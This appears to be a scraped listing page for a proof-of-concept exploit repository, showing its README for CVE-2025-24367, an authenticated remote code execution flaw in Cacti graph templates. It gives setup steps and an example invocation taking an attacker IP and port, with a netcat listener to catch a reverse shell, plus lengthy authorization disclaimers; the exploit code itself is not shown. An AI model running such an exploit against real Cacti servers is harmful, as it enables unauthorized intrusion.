来源

关联漏洞

描述

Proof of Concept for CVE-2025-24367

介绍

# CVE-2025-24367 - Cacti Authenticated Graph Template RCE
# Usage & Safety

> **Important — Read this first:**  
> This repository and `exploit.py` are provided **for educational and research purposes only**. Do **not** use this code against systems, networks, or services for which you do not have **explicit, written authorization**. Unauthorized access to computer systems is illegal and unethical. By using this code you agree to follow applicable laws and institutional policies.

---

## Requirements

- Python 3.8+

```bash
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
```

---

## Usage

```text
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
```

### Example

Before running the script make sure you have a nc listener running. Run the script without proxy unless debugging:

```bash
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost
```

---

## VERY IMPORTANT WARNINGS

- **Do not run this against production systems or any system you do not own or have explicit permission to test.**
- Always obtain **written authorization** before performing security testing.
- Use isolated lab environments (e.g., VMs, containers, or purpose-built test networks) for experimentation.
- Your organization may have reporting and disclosure policies — follow them.
- The authors accept no responsibility for misuse of this code.

**Final reminder:** This script and README are for **educational use only**. Never use these tools to access systems unlawfully.

文件快照

 [4.0K]  /data/pocs/92cbbde36402f290f268b52109a526ab51b5a843
├── [8.3K]  exploit.py
└── [1.6K]  README.md

1 directory, 2 files

备注